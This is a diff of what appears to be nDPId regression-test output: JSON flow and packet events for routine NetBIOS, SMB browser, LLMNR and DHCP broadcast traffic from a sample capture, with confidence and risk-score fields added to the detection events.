-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104392072,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104392072,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tXCABFAAFZOwBAAEARsV\/AqIyM\/\/\/\/\/\/YA9gABRQTx\/\/\/Z1aAAwKC7c+tXwKiMjAAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tXQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI2AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqIyM\/\/8AAFBvcnQgOAAAIAGwIAAGAADCoLv\/\/nPrV0A="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1470104392072,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"ts_msec":1470104392072,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRMAf\/D9nVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1470104392380,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104392380,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOckUAAEARgdzAqAUtwKj\/\/+mNAIkAOs9OABUBEAABAAAAAAAAIEZERUJFT0VLRUpDTkVNRUpFR0VGRUNFUEVQRUxDTkNBAAAgAAE="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1470104393097,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104393097,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxQAAIARlk7AqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOGrEAAEAR2XDAqAUtwKj\/\/+hFAIkAOjOmABcBEAABAAAAAAAAIEVIRUdFSkVNRUZDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBAAAgAAE="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOnJgAAEARV4nAqAUtwKj\/\/wCJAIkAOr16RfsBEAABAAAAAAAAIEVPRUJGREVHRUpFTUVGQ0FDQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKO0kAAEARuFzAqAUtwKj\/\/wCKAIoAtoWlEQJF7sCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAO1FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTsRQAA"}
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1470104393610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADK5DUAAEARD3DAqAUtwKj\/\/wCKAIoAtoasEQJF8cCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkRFSUVQRU5FRkNBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPBFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTvRQAA"}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1470104393611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1470104393611,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKOS4AAEARunfAqAUtwKj\/\/wCKAIoAtoChEQJF98CoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkpFSEZDRVBGRkZBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPZFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQT1RQAA"}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1470104393813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104393813,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxcAAIARlkvAqAPswKj\/\/wCJAIkAOqdiilUBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
@@ -308,46 +308,46 @@
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1470104395657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104395657,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARqaYAAAAA\/\/\/\/\/wBEAEMBNLOUAQEGALkL8pMAEIAAAAAAAAAAAAAAAAAAAAAAAExeDOoDZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPQcBTF4M6gNlNwYBAwYPLCH\/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1470104396888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1470104396888,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1470104396889,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104396889,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi0AAAERlLzAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1470104396987,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104396987,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi4AAAERlLvAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1470104397091,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104397091,"pkt":"\/\/\/\/\/\/\/\/cPGh+Cr9CABFAAFIAzMAAIARcMHAqAUJ\/\/\/\/\/wBEAEMBND1aAQEGAPwPedgAAIAAwKgFCQAAAAAAAAAAAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBcPGh+Cr9DAlKb2FubmEtUEM8CE1TRlQgNS4wNw0BDwMGLC4vHyF5+Sv8\/wAAAAAAAAAAAAAA"}
